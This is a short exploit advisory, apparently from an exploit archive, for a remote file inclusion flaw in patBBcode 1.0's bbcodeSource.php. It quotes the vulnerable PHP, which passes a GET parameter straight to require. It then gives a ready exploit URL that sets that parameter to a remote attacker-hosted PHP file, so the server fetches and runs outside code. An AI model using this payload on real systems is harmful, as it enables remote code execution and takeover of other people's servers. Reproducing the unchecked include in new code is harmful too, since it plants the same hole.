patBBcode 1.0 bbcodeSource.php Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : patBBcode 1.0 bbcodeSource.php Remote File Inclusion Vulnerability
# Published : 2007-11-12
# Author : p4sswd
# Previous Title : Myspace Clone Script Remote SQL Injection Vulnerability
# Next Title : Softbiz Auctions Script product_desc.php Remote SQL Injection Vuln

Link to download:
http://www.php-tools.net/site.php?file=patBBCode/overview.xml

Vuln file:
examplespatExampleGenbbcodeSource.php

Vuln code:
    if( !isset( $_GET['example'] ) )
        die( 'No example selected.' );
   
    $exampleId = $_GET['example'];

    ob_start();

    // make the example think it's still in the right place
    chdir( '../' );
   
    // include the example
    require $exampleId.'.php';
   
    ob_end_clean();

Exploit:
examplespatExampleGenbbcodeSource.php?example= http://server.com/evilcode.php

# www.Syue.com [2007-11-12]